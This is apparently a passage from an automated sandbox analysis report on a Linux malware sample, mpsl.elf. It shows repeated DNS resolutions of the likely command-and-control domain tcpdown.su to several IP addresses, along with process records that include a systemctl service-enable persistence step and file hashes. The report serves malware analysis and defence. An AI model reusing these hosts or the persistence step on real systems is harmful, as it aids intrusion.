                                                                                                              Jan 7, 2025 01:09:36.308017969 CET1.1.1.1192.168.2.130x9b5fNo error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:36.308017969 CET1.1.1.1192.168.2.130x9b5fNo error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:36.308017969 CET1.1.1.1192.168.2.130x9b5fNo error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:36.326466084 CET1.1.1.1192.168.2.130x99cdName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:36.338979006 CET1.1.1.1192.168.2.130x99cdName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:36.351916075 CET1.1.1.1192.168.2.130x99cdName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:36.364597082 CET1.1.1.1192.168.2.130x99cdName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:36.381639004 CET1.1.1.1192.168.2.130x99cdName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.297297001 CET1.1.1.1192.168.2.130xa171No error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.297297001 CET1.1.1.1192.168.2.130xa171No error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.297297001 CET1.1.1.1192.168.2.130xa171No error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.297297001 CET1.1.1.1192.168.2.130xa171No error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.297297001 CET1.1.1.1192.168.2.130xa171No error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.297297001 CET1.1.1.1192.168.2.130xa171No error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.297297001 CET1.1.1.1192.168.2.130xa171No error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.491684914 CET1.1.1.1192.168.2.130x9fb2Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.529294014 CET1.1.1.1192.168.2.130x9fb2Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.562469006 CET1.1.1.1192.168.2.130x9fb2Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.581551075 CET1.1.1.1192.168.2.130x9fb2Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:38.596405029 CET1.1.1.1192.168.2.130x9fb2Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.475193977 CET1.1.1.1192.168.2.130x7b76No error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.475193977 CET1.1.1.1192.168.2.130x7b76No error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.475193977 CET1.1.1.1192.168.2.130x7b76No error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.475193977 CET1.1.1.1192.168.2.130x7b76No error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.475193977 CET1.1.1.1192.168.2.130x7b76No error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.475193977 CET1.1.1.1192.168.2.130x7b76No error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.475193977 CET1.1.1.1192.168.2.130x7b76No error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.485817909 CET1.1.1.1192.168.2.130xfdbName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.494653940 CET1.1.1.1192.168.2.130xfdbName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.508982897 CET1.1.1.1192.168.2.130xfdbName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.529908895 CET1.1.1.1192.168.2.130xfdbName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:40.539072037 CET1.1.1.1192.168.2.130xfdbName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.391825914 CET1.1.1.1192.168.2.130xf191No error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.391825914 CET1.1.1.1192.168.2.130xf191No error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.391825914 CET1.1.1.1192.168.2.130xf191No error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.391825914 CET1.1.1.1192.168.2.130xf191No error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.391825914 CET1.1.1.1192.168.2.130xf191No error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.391825914 CET1.1.1.1192.168.2.130xf191No error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.391825914 CET1.1.1.1192.168.2.130xf191No error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.402287960 CET1.1.1.1192.168.2.130x58e1Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.411350965 CET1.1.1.1192.168.2.130x58e1Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.420355082 CET1.1.1.1192.168.2.130x58e1Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.436883926 CET1.1.1.1192.168.2.130x58e1Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:42.453128099 CET1.1.1.1192.168.2.130x58e1Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.309570074 CET1.1.1.1192.168.2.130x2fe8No error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.309570074 CET1.1.1.1192.168.2.130x2fe8No error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.309570074 CET1.1.1.1192.168.2.130x2fe8No error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.309570074 CET1.1.1.1192.168.2.130x2fe8No error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.309570074 CET1.1.1.1192.168.2.130x2fe8No error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.309570074 CET1.1.1.1192.168.2.130x2fe8No error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.309570074 CET1.1.1.1192.168.2.130x2fe8No error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.323880911 CET1.1.1.1192.168.2.130x3aa0Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.332304955 CET1.1.1.1192.168.2.130x3aa0Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.350178003 CET1.1.1.1192.168.2.130x3aa0Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.369431019 CET1.1.1.1192.168.2.130x3aa0Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:44.388986111 CET1.1.1.1192.168.2.130x3aa0Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.251554966 CET1.1.1.1192.168.2.130x42f5No error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.251554966 CET1.1.1.1192.168.2.130x42f5No error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.251554966 CET1.1.1.1192.168.2.130x42f5No error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.251554966 CET1.1.1.1192.168.2.130x42f5No error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.251554966 CET1.1.1.1192.168.2.130x42f5No error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.251554966 CET1.1.1.1192.168.2.130x42f5No error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.251554966 CET1.1.1.1192.168.2.130x42f5No error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.260752916 CET1.1.1.1192.168.2.130x93d7Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.268454075 CET1.1.1.1192.168.2.130x93d7Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.276242971 CET1.1.1.1192.168.2.130x93d7Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.283740997 CET1.1.1.1192.168.2.130x93d7Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:46.291398048 CET1.1.1.1192.168.2.130x93d7Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.191108942 CET1.1.1.1192.168.2.130x27b0No error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.191108942 CET1.1.1.1192.168.2.130x27b0No error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.191108942 CET1.1.1.1192.168.2.130x27b0No error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.191108942 CET1.1.1.1192.168.2.130x27b0No error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.191108942 CET1.1.1.1192.168.2.130x27b0No error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.191108942 CET1.1.1.1192.168.2.130x27b0No error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.191108942 CET1.1.1.1192.168.2.130x27b0No error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.202320099 CET1.1.1.1192.168.2.130x8e4Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.220556974 CET1.1.1.1192.168.2.130x8e4Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.228368044 CET1.1.1.1192.168.2.130x8e4Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.236027956 CET1.1.1.1192.168.2.130x8e4Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:48.243966103 CET1.1.1.1192.168.2.130x8e4Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.812753916 CET1.1.1.1192.168.2.130xca71No error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.812753916 CET1.1.1.1192.168.2.130xca71No error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.812753916 CET1.1.1.1192.168.2.130xca71No error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.812753916 CET1.1.1.1192.168.2.130xca71No error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.812753916 CET1.1.1.1192.168.2.130xca71No error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.812753916 CET1.1.1.1192.168.2.130xca71No error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.812753916 CET1.1.1.1192.168.2.130xca71No error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.820650101 CET1.1.1.1192.168.2.130x2d37Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.828130960 CET1.1.1.1192.168.2.130x2d37Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.835601091 CET1.1.1.1192.168.2.130x2d37Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.843921900 CET1.1.1.1192.168.2.130x2d37Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:49.859469891 CET1.1.1.1192.168.2.130x2d37Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.750874996 CET1.1.1.1192.168.2.130x6269No error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.750874996 CET1.1.1.1192.168.2.130x6269No error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.750874996 CET1.1.1.1192.168.2.130x6269No error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.750874996 CET1.1.1.1192.168.2.130x6269No error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.750874996 CET1.1.1.1192.168.2.130x6269No error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.750874996 CET1.1.1.1192.168.2.130x6269No error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.750874996 CET1.1.1.1192.168.2.130x6269No error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.758481026 CET1.1.1.1192.168.2.130x5b77Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.777852058 CET1.1.1.1192.168.2.130x5b77Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.792006016 CET1.1.1.1192.168.2.130x5b77Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.800055027 CET1.1.1.1192.168.2.130x5b77Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:51.808662891 CET1.1.1.1192.168.2.130x5b77Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.353468895 CET1.1.1.1192.168.2.130x9e6eNo error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.353468895 CET1.1.1.1192.168.2.130x9e6eNo error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.353468895 CET1.1.1.1192.168.2.130x9e6eNo error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.353468895 CET1.1.1.1192.168.2.130x9e6eNo error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.353468895 CET1.1.1.1192.168.2.130x9e6eNo error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.353468895 CET1.1.1.1192.168.2.130x9e6eNo error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.353468895 CET1.1.1.1192.168.2.130x9e6eNo error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.361603975 CET1.1.1.1192.168.2.130x3faeName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.369473934 CET1.1.1.1192.168.2.130x3faeName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.388869047 CET1.1.1.1192.168.2.130x3faeName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.396502018 CET1.1.1.1192.168.2.130x3faeName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:53.404627085 CET1.1.1.1192.168.2.130x3faeName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.104242086 CET1.1.1.1192.168.2.130xbaf4No error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.104242086 CET1.1.1.1192.168.2.130xbaf4No error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.104242086 CET1.1.1.1192.168.2.130xbaf4No error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.104242086 CET1.1.1.1192.168.2.130xbaf4No error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.104242086 CET1.1.1.1192.168.2.130xbaf4No error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.104242086 CET1.1.1.1192.168.2.130xbaf4No error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.104242086 CET1.1.1.1192.168.2.130xbaf4No error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.114089012 CET1.1.1.1192.168.2.130xc370Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.135445118 CET1.1.1.1192.168.2.130xc370Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.145930052 CET1.1.1.1192.168.2.130xc370Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.156394958 CET1.1.1.1192.168.2.130xc370Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:55.166430950 CET1.1.1.1192.168.2.130xc370Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.809972048 CET1.1.1.1192.168.2.130xfb1dNo error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.809972048 CET1.1.1.1192.168.2.130xfb1dNo error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.809972048 CET1.1.1.1192.168.2.130xfb1dNo error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.809972048 CET1.1.1.1192.168.2.130xfb1dNo error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.809972048 CET1.1.1.1192.168.2.130xfb1dNo error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.809972048 CET1.1.1.1192.168.2.130xfb1dNo error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.809972048 CET1.1.1.1192.168.2.130xfb1dNo error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.817677021 CET1.1.1.1192.168.2.130x83b6Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.825311899 CET1.1.1.1192.168.2.130x83b6Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.833046913 CET1.1.1.1192.168.2.130x83b6Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.840703964 CET1.1.1.1192.168.2.130x83b6Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:56.848447084 CET1.1.1.1192.168.2.130x83b6Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.533010960 CET1.1.1.1192.168.2.130x89edNo error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.533010960 CET1.1.1.1192.168.2.130x89edNo error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.533010960 CET1.1.1.1192.168.2.130x89edNo error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.533010960 CET1.1.1.1192.168.2.130x89edNo error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.533010960 CET1.1.1.1192.168.2.130x89edNo error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.533010960 CET1.1.1.1192.168.2.130x89edNo error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.533010960 CET1.1.1.1192.168.2.130x89edNo error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.541791916 CET1.1.1.1192.168.2.130x4c3fName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.552382946 CET1.1.1.1192.168.2.130x4c3fName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.561439991 CET1.1.1.1192.168.2.130x4c3fName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.570235014 CET1.1.1.1192.168.2.130x4c3fName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:09:58.591775894 CET1.1.1.1192.168.2.130x4c3fName error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.577289104 CET1.1.1.1192.168.2.130xfe02No error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.577289104 CET1.1.1.1192.168.2.130xfe02No error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.577289104 CET1.1.1.1192.168.2.130xfe02No error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.577289104 CET1.1.1.1192.168.2.130xfe02No error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.577289104 CET1.1.1.1192.168.2.130xfe02No error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.577289104 CET1.1.1.1192.168.2.130xfe02No error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.577289104 CET1.1.1.1192.168.2.130xfe02No error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.624587059 CET1.1.1.1192.168.2.130x8b04Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.719167948 CET1.1.1.1192.168.2.130x8b04Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.759258986 CET1.1.1.1192.168.2.130x8b04Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.767234087 CET1.1.1.1192.168.2.130x8b04Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 7, 2025 01:10:00.786473036 CET1.1.1.1192.168.2.130x8b04Name error (3)tcpdown.suFnonenoneA (IP address)IN (0x0001)false

                                                                                                              System Behavior

                                                                                                              Start time (UTC):00:09:33
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/tmp/mpsl.elf
                                                                                                              Arguments:/tmp/mpsl.elf
                                                                                                              File size:5773336 bytes
                                                                                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                                              Start time (UTC):00:09:33
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/tmp/mpsl.elf
                                                                                                              Arguments:-
                                                                                                              File size:5773336 bytes
                                                                                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                                              Start time (UTC):00:09:33
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/tmp/mpsl.elf
                                                                                                              Arguments:-
                                                                                                              File size:5773336 bytes
                                                                                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                                              Start time (UTC):00:09:33
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/tmp/mpsl.elf
                                                                                                              Arguments:-
                                                                                                              File size:5773336 bytes
                                                                                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                                              Start time (UTC):00:09:33
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/tmp/mpsl.elf
                                                                                                              Arguments:-
                                                                                                              File size:5773336 bytes
                                                                                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                                              Start time (UTC):00:09:33
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/tmp/mpsl.elf
                                                                                                              Arguments:-
                                                                                                              File size:5773336 bytes
                                                                                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                                              Start time (UTC):00:09:33
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/bin/sh
                                                                                                              Arguments:sh -c "systemctl daemon-reload"
                                                                                                              File size:129816 bytes
                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                              Start time (UTC):00:09:33
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/bin/sh
                                                                                                              Arguments:-
                                                                                                              File size:129816 bytes
                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                              Start time (UTC):00:09:33
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/usr/bin/systemctl
                                                                                                              Arguments:systemctl daemon-reload
                                                                                                              File size:996584 bytes
                                                                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                              Start time (UTC):00:09:34
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/tmp/mpsl.elf
                                                                                                              Arguments:-
                                                                                                              File size:5773336 bytes
                                                                                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                                              Start time (UTC):00:09:34
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/bin/sh
                                                                                                              Arguments:sh -c "systemctl enable startup_command.service"
                                                                                                              File size:129816 bytes
                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

